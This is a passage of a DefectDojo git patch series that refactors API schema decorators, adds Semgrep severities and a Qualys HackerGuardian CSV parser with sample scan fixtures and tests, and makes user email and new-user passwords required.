OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to 
prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class TestImportViewSet( PrefetchDojoModelViewSet, ): @@ -2398,6 +2208,7 @@ def get_queryset(self): # Authorization: configurations +@extend_schema_view(**schema_with_prefetch()) class ToolConfigurationsViewSet( PrefetchDojoModelViewSet, ): @@ -2418,6 +2229,7 @@ def get_queryset(self): # Authorization: object-based +@extend_schema_view(**schema_with_prefetch()) class ToolProductSettingsViewSet( PrefetchDojoModelViewSet, ): @@ -2502,30 +2314,7 @@ def destroy(self, request, *args, **kwargs): # Authorization: superuser -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class UserContactInfoViewSet( PrefetchDojoModelViewSet, ): @@ -2680,30 +2469,7 @@ def get_queryset(self): # Authorization: object-based -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class LanguageViewSet( PrefetchDojoModelViewSet, ): @@ -3147,30 +2913,7 @@ def get_queryset(self): # Authorization: superuser -@extend_schema_view( - list=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), - retrieve=extend_schema( - parameters=[ - OpenApiParameter( - "prefetch", - OpenApiTypes.STR, - OpenApiParameter.QUERY, - required=False, - description="List of fields for which to prefetch model instances and add those to the response", - ), - ], - ), -) +@extend_schema_view(**schema_with_prefetch()) class NotificationsViewSet( PrefetchDojoModelViewSet, ): @@ -3184,6 +2927,7 @@ def get_queryset(self): return Notifications.objects.all().order_by("id") +@extend_schema_view(**schema_with_prefetch()) class EngagementPresetsViewset( PrefetchDojoModelViewSet, ): @@ -3303,6 +3047,7 @@ def get_queryset(self): return Engagement_Survey.objects.all().order_by("id") +@extend_schema_view(**schema_with_prefetch()) class QuestionnaireAnsweredSurveyViewSet( prefetch.PrefetchListMixin, prefetch.PrefetchRetrieveMixin, From 09500cead339e12c650a40b726f81f13a8f62d7f Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Fri, 20 Sep 2024 16:17:31 -0500 Subject: [PATCH 48/62] Semgrep Parser: Add new severities (#10936) --- dojo/tools/semgrep/parser.py | 11 ++- .../semgrep/high-medium-low-severities.json | 95 +++++++++++++++++++ unittests/tools/test_semgrep_parser.py | 6 ++ 3 files 
changed, 108 insertions(+), 4 deletions(-) create mode 100644 unittests/scans/semgrep/high-medium-low-severities.json diff --git a/dojo/tools/semgrep/parser.py b/dojo/tools/semgrep/parser.py index aa4f7307503..e64615ec53b 100644 --- a/dojo/tools/semgrep/parser.py +++ b/dojo/tools/semgrep/parser.py @@ -130,13 +130,16 @@ def get_findings(self, filename, test): return list(dupes.values()) def convert_severity(self, val): - if "CRITICAL" == val.upper(): + upper_value = val.upper() + if upper_value == "CRITICAL": return "Critical" - elif "WARNING" == val.upper(): + elif upper_value in ["WARNING", "MEDIUM"]: return "Medium" - elif "ERROR" == val.upper() or "HIGH" == val.upper(): + elif upper_value in ["ERROR", "HIGH"]: return "High" - elif "INFO" == val.upper(): + elif upper_value == "LOW": + return "Low" + elif upper_value == "INFO": return "Info" else: msg = f"Unknown value for severity: {val}" diff --git a/unittests/scans/semgrep/high-medium-low-severities.json b/unittests/scans/semgrep/high-medium-low-severities.json new file mode 100644 index 00000000000..c2fd9c8714b --- /dev/null +++ b/unittests/scans/semgrep/high-medium-low-severities.json @@ -0,0 +1,95 @@ + { + "errors": [], + "interfile_languages_used": [], + "paths": { + "scanned": [] + }, + "results": [ + { + "check_id": "rules.sast.dev.generic.internal.detect-cdn-usage-react-express", + "end": { + "col": 89, + "line": 48, + "offset": 1772 + }, + "extra": { + "engine_kind": "OSS", + "fingerprint": "d30b51e68d2d56fb34e5a87920208e0f18b71dbec62b2ad91d1b55e566c5796c64b1e161d7fd3c0f65834756474c0617c29b7c5bd76b76f14f2d3fc537a664b9_0", + "is_ignored": false, + "lines": "", + "message": "Potential CDN usage detected. Consider removing or replacing CDN references to comply with GDPR and also avoid supply chain risk", + "metadata": { + "category": "security", + "technology": "cdn" + }, + "metavars": {}, + "severity": "LOW", + "validation_state": "NO_VALIDATOR" + }, + "path": "/Users/user.example/git/company/full-codebase/company/lead-magnet/src/templates/base.html.twig", + "start": { + "col": 1, + "line": 48, + "offset": 1684 + } + }, + { + "check_id": "rules.sast.dev.generic.internal.detect-cdn-usage-react-express", + "end": { + "col": 206, + "line": 49, + "offset": 1978 + }, + "extra": { + "engine_kind": "OSS", + "fingerprint": "d30b51e68d2d56fb34e5a87920208e0f18b71dbec62b2ad91d1b55e566c5796c64b1e161d7fd3c0f65834756474c0617c29b7c5bd76b76f14f2d3fc537a664b9_1", + "is_ignored": false, + "lines": "", + "message": "Potential CDN usage detected. Consider removing or replacing CDN references to comply with GDPR and also avoid supply chain risk", + "metadata": { + "category": "security", + "technology": "cdn" + }, + "metavars": {}, + "severity": "LOW", + "validation_state": "NO_VALIDATOR" + }, + "path": "/Users/user.example/git/company/full-codebase/company/lead-magnet/src/templates/base.html.twig", + "start": { + "col": 1, + "line": 49, + "offset": 1773 + } + }, + { + "check_id": "rules.sast.dev.generic.internal.detect-cdn-usage-react-express", + "end": { + "col": 203, + "line": 50, + "offset": 2181 + }, + "extra": { + "engine_kind": "OSS", + "fingerprint": "d30b51e68d2d56fb34e5a87920208e0f18b71dbec62b2ad91d1b55e566c5796c64b1e161d7fd3c0f65834756474c0617c29b7c5bd76b76f14f2d3fc537a664b9_2", + "is_ignored": false, + "lines": "{% block javascripts %}{% endblock %}", + "message": "Potential CDN usage detected. 
Consider removing or replacing CDN references to comply with GDPR and also avoid supply chain risk", + "metadata": { + "category": "security", + "technology": "cdn" + }, + "metavars": {}, + "severity": "LOW", + "validation_state": "NO_VALIDATOR" + }, + "path": "/Users/user.example/git/company/full-codebase/company/lead-magnet/src/templates/base.html.twig", + "start": { + "col": 1, + "line": 50, + "offset": 1979 + } + } + ], + "skipped_rules": [], + "version": "1.84.1" +} \ No newline at end of file diff --git a/unittests/tools/test_semgrep_parser.py b/unittests/tools/test_semgrep_parser.py index 6892b0b8494..8729e4cc006 100644 --- a/unittests/tools/test_semgrep_parser.py +++ b/unittests/tools/test_semgrep_parser.py @@ -121,6 +121,12 @@ def test_parse_issue_8435(self): findings = parser.get_findings(testfile, Test()) self.assertEqual(1, len(findings)) + def test_parse_low_medium_high_severity(self): + with open("unittests/scans/semgrep/high-medium-low-severities.json", encoding="utf-8") as testfile: + parser = SemgrepParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(3, len(findings)) + def test_parse_sca_deployments_vulns(self): with open("unittests/scans/semgrep/sca-deployments-vulns.json", encoding="utf-8") as testfile: parser = SemgrepParser() From a69b67e2a292d5668894e5eb0fcf558ac0f8b831 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Fri, 20 Sep 2024 16:18:44 -0500 Subject: [PATCH 49/62] New Parser: Qualys Hacker Guardian (#10937) * New Parser: Qualys Hacker Guardian * Restore unit tests * Fix ruff * Update docs/content/en/integrations/parsers/file/qualys_hacker_guardian.md Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --------- Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --- .../parsers/file/qualys_hacker_guardian.md | 9 +++ dojo/tools/qualys_hacker_guardian/__init__.py | 0 dojo/tools/qualys_hacker_guardian/parser.py | 77 +++++++++++++++++++ .../qualys_hacker_guardian/many_finding.csv | 5 ++ .../qualys_hacker_guardian/one_finding.csv | 3 + .../qualys_hacker_guardian/zero_finding.csv | 1 + .../test_qualys_hacker_guardian_parser.py | 46 +++++++++++ 7 files changed, 141 insertions(+) create mode 100644 docs/content/en/integrations/parsers/file/qualys_hacker_guardian.md create mode 100644 dojo/tools/qualys_hacker_guardian/__init__.py create mode 100644 dojo/tools/qualys_hacker_guardian/parser.py create mode 100644 unittests/scans/qualys_hacker_guardian/many_finding.csv create mode 100644 unittests/scans/qualys_hacker_guardian/one_finding.csv create mode 100644 unittests/scans/qualys_hacker_guardian/zero_finding.csv create mode 100644 unittests/tools/test_qualys_hacker_guardian_parser.py diff --git a/docs/content/en/integrations/parsers/file/qualys_hacker_guardian.md b/docs/content/en/integrations/parsers/file/qualys_hacker_guardian.md new file mode 100644 index 00000000000..e938970a385 --- /dev/null +++ b/docs/content/en/integrations/parsers/file/qualys_hacker_guardian.md @@ -0,0 +1,9 @@ +--- +title: "Qualys Hacker Guardian Scan" +toc_hide: true +--- +Qualys Hacker Guardian CSV export + +### Sample Scan Data + +Sample Qualys Scan scans can be found [here](https://github.com/DefectDojo/django-DefectDojo/tree/master/unittests/scans/qualys_hacker_guardian). 
\ No newline at end of file
diff --git a/dojo/tools/qualys_hacker_guardian/__init__.py b/dojo/tools/qualys_hacker_guardian/__init__.py
new file mode 100644
index 00000000000..e69de29bb2d
diff --git a/dojo/tools/qualys_hacker_guardian/parser.py b/dojo/tools/qualys_hacker_guardian/parser.py
new file mode 100644
index 00000000000..0baea41ac6e
--- /dev/null
+++ b/dojo/tools/qualys_hacker_guardian/parser.py
@@ -0,0 +1,77 @@
+import csv
+import io
+
+from dateutil import parser as date_parser
+
+from dojo.models import Endpoint, Finding
+
+
+class QualysHackerGuardianParser:
+    """Parser for Qualys HackerGuardian"""
+
+    # Severity mapping taken from
+    # https://qualysguard.qg2.apps.qualys.com/portal-help/en/malware/knowledgebase/severity_levels.htm
+    qualys_severity_lookup = {
+        "1": "Low",
+        "2": "Low",
+        "3": "Medium",
+        "4": "High",
+        "5": "High",
+    }
+
+    def get_scan_types(self):
+        return ["Qualys Hacker Guardian Scan"]
+
+    def get_label_for_scan_types(self, scan_type):
+        return "Qualys Hacker Guardian Scan"
+
+    def get_description_for_scan_types(self, scan_type):
+        return "Qualys Hacker Guardian report file can be imported in CSV format."
+
+    def get_endpoint(self, row):
+        host = row.get("HOSTNAME", row.get("IP"))
+        if (port := row.get("PORT")) is not None:
+            host += f":{port}"
+        if (protocol := row.get("PROTOCOL")) is not None:
+            host = f"{protocol}://{host}"
+
+        return host
+
+    def get_findings(self, filename, test):
+        if filename is None:
+            return ()
+        content = filename.read()
+        if isinstance(content, bytes):
+            content = content.decode("utf-8")
+        reader = csv.DictReader(io.StringIO(content), delimiter=",", quotechar='"')
+        dupes = {}
+        for row in reader:
+            endpoint = Endpoint.from_uri(self.get_endpoint(row))
+            finding = Finding(
+                title=row.get("VULN TITLE"),
+                severity=self.qualys_severity_lookup[row.get("Q_SEVERITY", "1")],
+                description=(
+                    f'**Category**: {row.get("CATEGORY", "Unknown")}\n'
+                    f'**Threat**: {row.get("THREAT", "No threat detected")}\n'
+                    f'**Result**: {row.get("RESULT", "No threat detected")}\n'
+                ),
+                date=date_parser.parse(row.get("LAST SCAN")),
+                impact=row.get("IMPACT"),
+                mitigation=row.get("SOLUTION"),
+                unique_id_from_tool=row.get("QID"),
+                dynamic_finding=True,
+                active=True,
+                nb_occurences=1,
+            )
+            finding.unsaved_endpoints.append(endpoint)
+
+            dupe_key = finding.unique_id_from_tool
+            if dupe_key in dupes:
+                finding = dupes[dupe_key]
+                if endpoint not in finding.unsaved_endpoints:
+                    finding.unsaved_endpoints.append(endpoint)
+                finding.nb_occurences += 1
+            else:
+                dupes[dupe_key] = finding
+
+        return list(dupes.values())
diff --git a/unittests/scans/qualys_hacker_guardian/many_finding.csv b/unittests/scans/qualys_hacker_guardian/many_finding.csv
new file mode 100644
index 00000000000..c2c6e210e78
--- /dev/null
+++ b/unittests/scans/qualys_hacker_guardian/many_finding.csv
@@ -0,0 +1,5 @@
+"IP","HOSTNAME","LAST SCAN","QID","VULN TITLE","TYPE","SEVERITY","PORT","PROTOCOL","OPERATING SYSTEM","IS_PCI","FALSE POSITIVE STATUS","CVSS_BASE","Q_SEVERITY","THREAT","IMPACT","SOLUTION","CVSS_TEMPORAL","CATEGORY","RESULT","BUGTRAQID","CVEID"
This may potentially be a sensitive information.","The content should be reviewed to determine whether it could be masked or removed.","4.7","Web Application","url: https://help.example.co/ matched: .toLowerCase().split(\ -\ ) c=b.join(\ _\ );return c}} {key:\ fetchQuery\ value:function i(a){var b=this c=this.props d=c.org e=c.domain f=this.getTransformedNavigatorLang() g=f?\ &lang=\ +f:\ \ h=\ https://\ +d.name+\ .api.\ +e+\ /p/v1/kb/deflection/search?term=\ +encodeURIComponent(a)+g;return fetch(h).then(function(a){return a.json()}).then(function(a){var c=a.data;if(c){var d=c.slice(0 5);b.setState({articl url: https://help.example.co/. matched: .toLowerCase().split(\ -\ ) c=b.join(\ _\ );return c}} {key:\ fetchQuery\ value:function i(a){var b=this c=this.props d=c.org e=c.domain f=this.getTransformedNavigatorLang() g=f?\ &lang=\ +f:\ \ h=\ https://\ +d.name+\ .api.\ +e+\ /p/v1/kb/deflection/search?term=\ +encodeURIComponent(a)+g;return fetch(h).then(function(a){return a.json()}).then(function(a){var c=a.data;if(c){var d=c.slice(0 5);b.setState({articl","-","" +"18.238.109.17","help.example.co","2024-09-16 04:00:30","150059","Reference to Windows file path is present in HTML","POTENTIAL","M","443","tcp","","Y","-","5.3","1","Windows specific file path was detected in the response.","The response may be an error response that disclosed a local file path. This may potentially be a sensitive information.","The content should be reviewed to determine whether it could be masked or removed.","4.7","Web Application","url: https://help.example.co/ matched: .toLowerCase().split(\ -\ ) c=b.join(\ _\ );return c}} {key:\ fetchQuery\ value:function i(a){var b=this c=this.props d=c.org e=c.domain f=this.getTransformedNavigatorLang() g=f?\ &lang=\ +f:\ \ h=\ https://\ +d.name+\ .api.\ +e+\ /p/v1/kb/deflection/search?term=\ +encodeURIComponent(a)+g;return fetch(h).then(function(a){return a.json()}).then(function(a){var c=a.data;if(c){var d=c.slice(0 5);b.setState({articl","-","" +"44.207.58.177","jt.example.co","2024-09-15 09:00:18","11827","HTTP Security Header Not Detected","CONFIRMED","M","443","tcp","","Y","-","5.3","2","This QID reports the absence of the following HTTP headers according to CWE-693: Protection Mechanism Failure:
    X-Content-Type-Options: This HTTP header will prevent the browser from interpreting files as a different MIME type to what is specified in the Content-Type HTTP header.
    Strict-Transport-Security: The HTTP Strict-Transport-Security response header (HSTS) allows web servers to declare that web browsers (or other complying user agents) should only interact with it using secure HTTPS connections and never via the insecure HTTP protocol.

    QID Detection Logic:
    This unauthenticated QID looks for the presence of the following HTTP responses:
    The Valid directives are as belows: X-Content-Type-Options: nosniff

    Strict-Transport-Security: max-age=< [;includeSubDomains]

    ","Depending on the vulnerability being exploited an unauthenticated remote attacker could conduct cross-site scripting clickjacking or MIME-type sniffing attacks.","Note: To better debug the results of this QID it is requested that customers execute commands to simulate the following functionality: curl -lkL --verbose.

    CWE-693: Protection Mechanism Failure mentions the following - The product does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product. A "missing" protection mechanism occurs when the application does not define any mechanism against a certain class of attack. An "insufficient" protection mechanism might provide some defenses - for example against the most common attacks - but it does not protect against everything that is intended. Finally an "ignored" mechanism occurs when a mechanism is available and in active use within the product but the developer has not applied it in some code path.

    Customers are advised to set proper X-Content-Type-Options and Strict-Transport-Security HTTP response headers.

    Depending on their server software customers can set directives in their site configuration or Web.config files. Few examples are:

    X-Content-Type-Options:
    Apache: Header always set X-Content-Type-Options: nosniff

    HTTP Strict-Transport-Security:
    Apache: Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains"
    Nginx: add_header Strict-Transport-Security max-age=31536000;

    Note: Network devices that include a HTTP/HTTPS console for administrative/management purposes often do not include all/some of the security headers. This is a known issue and it is recommend to contact the vendor for a solution.

    ","4.7","CGI","X-Content-Type-Options HTTP Header missing on port 443. GET / HTTP/1.1 Host: jt.example.co Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 jt edge server ver v1.42.0-1-g7a7022e4 / 2022-06-09T21:08:14.000000Z jt edge server ver v1.42.0-1-g7a7022e4 / 2022-06-09T21:08:14.000000Z. Configure jt (/configurator) Strict-Transport-Security HTTP Header missing on port 443. HTTP/1.1 200 OK Date: Sun 15 Sep 2024 09:12:26 GMT Content-Type: text/html; charset=utf-8 Content-Length: 274 Connection: keep-alive Server: nginx/1.21.6","-","" +"44.220.118.158","data.example.co","2024-09-16 04:00:30","150004","Predictable Resource Location Via Forced Browsing","CONFIRMED","M","80","tcp","","Y","-","5.3","2","A file directory or directory listing was discovered on the Web server. These resources are confirmed to be present based on our logic. Some of the content on these files might have sensitive information.

    NOTE: Links found in 150004 are found by forced crawling so will not automatically be added to 150009 Links Crawled or the application site map. If links found in 150004 need to be tested they must be added as Explicit URI so they are included in scope and then will be reported in 150009. Once the link is added to be in scope (i.e. Explicit URI) this same link will no longer be reported for 150004.","The contents of this file or directory may disclose sensitive information.","It is advised to review the contents of the disclosed files. If the contents contain sensitive information please verify that access to this file or directory is permitted. If necessary remove it or apply access controls to it.","4.7","Web Application","url: https://data.example.co/wp-content/uploads/2023/01/image.png Payload: https://data.example.co/feed/image/ comment: Found this Vulnerability for redirect link: https://data.example.co/wp-content/uploads/2023/01/image.png. It was redirected from: https://data.example.co/feed/image/. Original URL is: https://data.example.co/feed/ matched: HTTP/1.1 200 OK url: https://data.example.co/wp-content/uploads/2023/08/download.svg Payload: https://data.example.co/feed/download/ comment: Found this Vulnerability for redirect link: https://data.example.co/wp-content/uploads/2023/08/download.svg. It was redirected from: https://data.example.co/feed/download/. Original URL is: https://data.example.co/feed/ matched: HTTP/1.1 200 OK url: https://data.example.co/test-flow-shopify-bw/ Payload: https://data.example.co:443/test/ comment: Found this Vulnerability for redirect link: https://data.example.co/test-flow-shopify-bw/. It was redirected from: https://data.example.co:443/test/. Original URL is: https://data.example.co:443/. matched: HTTP/1.1 200 OK url: https://data.example.co/wp-content/uploads/2023/08/users.svg Payload: https://data.example.co/feed/users/ comment: Found this Vulnerability for redirect link: https://data.example.co/wp-content/uploads/2023/08/users.svg. It was redirected from: https://data.example.co/feed/users/. Original URL is: https://data.example.co/feed/ matched: HTTP/1.1 200 OK","-","" diff --git a/unittests/scans/qualys_hacker_guardian/one_finding.csv b/unittests/scans/qualys_hacker_guardian/one_finding.csv new file mode 100644 index 00000000000..eaae1d75602 --- /dev/null +++ b/unittests/scans/qualys_hacker_guardian/one_finding.csv @@ -0,0 +1,3 @@ +"IP","HOSTNAME","LAST SCAN","QID","VULN TITLE","TYPE","SEVERITY","PORT","PROTOCOL","OPERATING SYSTEM","IS_PCI","FALSE POSITIVE STATUS","CVSS_BASE","Q_SEVERITY","THREAT","IMPACT","SOLUTION","CVSS_TEMPORAL","CATEGORY","RESULT","BUGTRAQID","CVEID" +"18.238.109.17","help.example.co","2024-09-16 04:00:30","150059","Reference to Windows file path is present in HTML","POTENTIAL","M","80","tcp","","Y","-","5.3","1","Windows specific file path was detected in the response.","The response may be an error response that disclosed a local file path. 
This may potentially be a sensitive information.","The content should be reviewed to determine whether it could be masked or removed.","4.7","Web Application","url: https://help.example.co/ matched: .toLowerCase().split(\ -\ ) c=b.join(\ _\ );return c}} {key:\ fetchQuery\ value:function i(a){var b=this c=this.props d=c.org e=c.domain f=this.getTransformedNavigatorLang() g=f?\ &lang=\ +f:\ \ h=\ https://\ +d.name+\ .api.\ +e+\ /p/v1/kb/deflection/search?term=\ +encodeURIComponent(a)+g;return fetch(h).then(function(a){return a.json()}).then(function(a){var c=a.data;if(c){var d=c.slice(0 5);b.setState({articl url: https://help.example.co/. matched: .toLowerCase().split(\ -\ ) c=b.join(\ _\ );return c}} {key:\ fetchQuery\ value:function i(a){var b=this c=this.props d=c.org e=c.domain f=this.getTransformedNavigatorLang() g=f?\ &lang=\ +f:\ \ h=\ https://\ +d.name+\ .api.\ +e+\ /p/v1/kb/deflection/search?term=\ +encodeURIComponent(a)+g;return fetch(h).then(function(a){return a.json()}).then(function(a){var c=a.data;if(c){var d=c.slice(0 5);b.setState({articl","-","" +"18.238.109.17","help.example.co","2024-09-16 04:00:30","150059","Reference to Windows file path is present in HTML","POTENTIAL","M","443","tcp","","Y","-","5.3","1","Windows specific file path was detected in the response.","The response may be an error response that disclosed a local file path. This may potentially be a sensitive information.","The content should be reviewed to determine whether it could be masked or removed.","4.7","Web Application","url: https://help.example.co/ matched: .toLowerCase().split(\ -\ ) c=b.join(\ _\ );return c}} {key:\ fetchQuery\ value:function i(a){var b=this c=this.props d=c.org e=c.domain f=this.getTransformedNavigatorLang() g=f?\ &lang=\ +f:\ \ h=\ https://\ +d.name+\ .api.\ +e+\ /p/v1/kb/deflection/search?term=\ +encodeURIComponent(a)+g;return fetch(h).then(function(a){return a.json()}).then(function(a){var c=a.data;if(c){var d=c.slice(0 5);b.setState({articl","-","" diff --git a/unittests/scans/qualys_hacker_guardian/zero_finding.csv b/unittests/scans/qualys_hacker_guardian/zero_finding.csv new file mode 100644 index 00000000000..8171af3c601 --- /dev/null +++ b/unittests/scans/qualys_hacker_guardian/zero_finding.csv @@ -0,0 +1 @@ +"IP","HOSTNAME","LAST SCAN","QID","VULN TITLE","TYPE","SEVERITY","PORT","PROTOCOL","OPERATING SYSTEM","IS_PCI","FALSE POSITIVE STATUS","CVSS_BASE","Q_SEVERITY","THREAT","IMPACT","SOLUTION","CVSS_TEMPORAL","CATEGORY","RESULT","BUGTRAQID","CVEID" diff --git a/unittests/tools/test_qualys_hacker_guardian_parser.py b/unittests/tools/test_qualys_hacker_guardian_parser.py new file mode 100644 index 00000000000..00ccb64499d --- /dev/null +++ b/unittests/tools/test_qualys_hacker_guardian_parser.py @@ -0,0 +1,46 @@ +from os import path + +from dojo.models import Test +from dojo.tools.qualys_hacker_guardian.parser import QualysHackerGuardianParser +from unittests.dojo_test_case import DojoTestCase + + +class TestQualysHackerGuardianParser(DojoTestCase): + + def test_qualys_hacker_guardian_parser_with_no_findings(self): + with open(path.join(path.dirname(__file__), "../scans/qualys_hacker_guardian/zero_finding.csv"), encoding="utf-8") as testfile: + parser = QualysHackerGuardianParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(0, len(findings)) + + def test_qualys_hacker_guardian_parser_with_one_findings(self): + with open(path.join(path.dirname(__file__), "../scans/qualys_hacker_guardian/one_finding.csv"), encoding="utf-8") as testfile: + parser = 
QualysHackerGuardianParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(1, len(findings)) + finding = findings[0] + self.assertEqual("Low", finding.severity) + self.assertEqual("Reference to Windows file path is present in HTML", finding.title) + self.assertIsNotNone(finding.description) + self.assertEqual(len(finding.unsaved_endpoints), 2) + + def test_qualys_hacker_guardian_parser_with_many_findings(self): + with open(path.join(path.dirname(__file__), "../scans/qualys_hacker_guardian/many_finding.csv"), encoding="utf-8") as testfile: + parser = QualysHackerGuardianParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(3, len(findings)) + finding = findings[0] + self.assertEqual("Low", finding.severity) + self.assertEqual("Reference to Windows file path is present in HTML", finding.title) + self.assertIsNotNone(finding.description) + self.assertEqual(len(finding.unsaved_endpoints), 2) + finding = findings[1] + self.assertEqual("HTTP Security Header Not Detected", finding.title) + self.assertEqual("Low", finding.severity) + self.assertIsNotNone(finding.description) + self.assertEqual(len(finding.unsaved_endpoints), 1) + finding = findings[2] + self.assertEqual("Predictable Resource Location Via Forced Browsing", finding.title) + self.assertEqual("Low", finding.severity) + self.assertIsNotNone(finding.description) + self.assertEqual(len(finding.unsaved_endpoints), 1) From cdee30b8a5b31c4f634ad2d97df275ef0d256109 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Fri, 20 Sep 2024 16:19:46 -0500 Subject: [PATCH 50/62] User: Make email required at all times, password required for new users (#10938) * User: Make email required at all times, password required for new users * fix tests * update tests --- dojo/api_v2/serializers.py | 9 +++++---- dojo/forms.py | 4 +++- tests/user_test.py | 3 +++ unittests/test_apiv2_notifications.py | 1 + unittests/test_apiv2_user.py | 14 ++++++++------ unittests/test_rest_framework.py | 13 ++++++++++++- 6 files changed, 32 insertions(+), 12 deletions(-) diff --git a/dojo/api_v2/serializers.py b/dojo/api_v2/serializers.py index a0d4298b740..10c07b3f3d4 100644 --- a/dojo/api_v2/serializers.py +++ b/dojo/api_v2/serializers.py @@ -429,6 +429,7 @@ class Meta: class UserSerializer(serializers.ModelSerializer): date_joined = serializers.DateTimeField(read_only=True) last_login = serializers.DateTimeField(read_only=True, allow_null=True) + email = serializers.EmailField(required=True) password = serializers.CharField( write_only=True, style={"input_type": "password"}, @@ -549,12 +550,12 @@ def validate(self, data): msg = "Only superusers are allowed to add or edit superusers." 
raise ValidationError(msg) - if ( - self.context["request"].method in ["PATCH", "PUT"] - and "password" in data - ): + if self.context["request"].method in ["PATCH", "PUT"] and "password" in data: msg = "Update of password though API is not allowed" raise ValidationError(msg) + if self.context["request"].method == "POST" and "password" not in data: + msg = "Passwords must be supplied for new users" + raise ValidationError(msg) else: return super().validate(data) diff --git a/dojo/forms.py b/dojo/forms.py index dde58a38b61..fd5c55a7b6a 100644 --- a/dojo/forms.py +++ b/dojo/forms.py @@ -2168,8 +2168,9 @@ def clean(self): class AddDojoUserForm(forms.ModelForm): + email = forms.EmailField(required=True) password = forms.CharField(widget=forms.PasswordInput, - required=False, + required=True, validators=[validate_password], help_text="") @@ -2186,6 +2187,7 @@ def __init__(self, *args, **kwargs): class EditDojoUserForm(forms.ModelForm): + email = forms.EmailField(required=True) class Meta: model = Dojo_User diff --git a/tests/user_test.py b/tests/user_test.py index dcaa9c845f4..607b8a7b4ea 100644 --- a/tests/user_test.py +++ b/tests/user_test.py @@ -59,6 +59,9 @@ def test_create_user_with_writer_global_role(self): # username driver.find_element(By.ID, "id_username").clear() driver.find_element(By.ID, "id_username").send_keys("userWriter") + # password + driver.find_element(By.ID, "id_password").clear() + driver.find_element(By.ID, "id_password").send_keys("Def3ctD0jo&") # First Name driver.find_element(By.ID, "id_first_name").clear() driver.find_element(By.ID, "id_first_name").send_keys("Writer") diff --git a/unittests/test_apiv2_notifications.py b/unittests/test_apiv2_notifications.py index 7149454ebd3..a31b859a76c 100644 --- a/unittests/test_apiv2_notifications.py +++ b/unittests/test_apiv2_notifications.py @@ -33,6 +33,7 @@ def create_test_user(self): password = "testTEST1234!@#$" r = self.client.post(reverse("user-list"), { "username": "api-user-notification", + "email": "admin@dojo.com", "password": password, }, format="json") return r.json()["id"] diff --git a/unittests/test_apiv2_user.py b/unittests/test_apiv2_user.py index 88f91bfb5ff..9b9fe026183 100644 --- a/unittests/test_apiv2_user.py +++ b/unittests/test_apiv2_user.py @@ -26,16 +26,11 @@ def test_user_list(self): self.assertNotIn(item, user, r.content[:1000]) def test_user_add(self): - # simple user without password - r = self.client.post(reverse("user-list"), { - "username": "api-user-1", - }, format="json") - self.assertEqual(r.status_code, 201, r.content[:1000]) - # user with good password password = "testTEST1234!@#$" r = self.client.post(reverse("user-list"), { "username": "api-user-2", + "email": "admin@dojo.com", "password": password, }, format="json") self.assertEqual(r.status_code, 201, r.content[:1000]) @@ -50,6 +45,7 @@ def test_user_add(self): # user with weak password r = self.client.post(reverse("user-list"), { "username": "api-user-3", + "email": "admin@dojo.com", "password": "weakPassword", }, format="json") self.assertEqual(r.status_code, 400, r.content[:1000]) @@ -59,6 +55,8 @@ def test_user_change_password(self): # some user r = self.client.post(reverse("user-list"), { "username": "api-user-4", + "email": "admin@dojo.com", + "password": "testTEST1234!@#$", }, format="json") self.assertEqual(r.status_code, 201, r.content[:1000]) user_id = r.json()["id"] @@ -66,16 +64,19 @@ def test_user_change_password(self): r = self.client.put("{}{}/".format(reverse("user-list"), user_id), { "username": "api-user-4", 
"first_name": "first", + "email": "admin@dojo.com", }, format="json") self.assertEqual(r.status_code, 200, r.content[:1000]) r = self.client.patch("{}{}/".format(reverse("user-list"), user_id), { "last_name": "last", + "email": "admin@dojo.com", }, format="json") self.assertEqual(r.status_code, 200, r.content[:1000]) r = self.client.put("{}{}/".format(reverse("user-list"), user_id), { "username": "api-user-4", + "email": "admin@dojo.com", "password": "testTEST1234!@#$", }, format="json") self.assertEqual(r.status_code, 400, r.content[:1000]) @@ -83,6 +84,7 @@ def test_user_change_password(self): r = self.client.patch("{}{}/".format(reverse("user-list"), user_id), { "password": "testTEST1234!@#$", + "email": "admin@dojo.com", }, format="json") self.assertEqual(r.status_code, 400, r.content[:1000]) self.assertIn("Update of password though API is not allowed", r.content.decode("utf-8")) diff --git a/unittests/test_rest_framework.py b/unittests/test_rest_framework.py index aa9318ba8f6..9fe9b1cc5f3 100644 --- a/unittests/test_rest_framework.py +++ 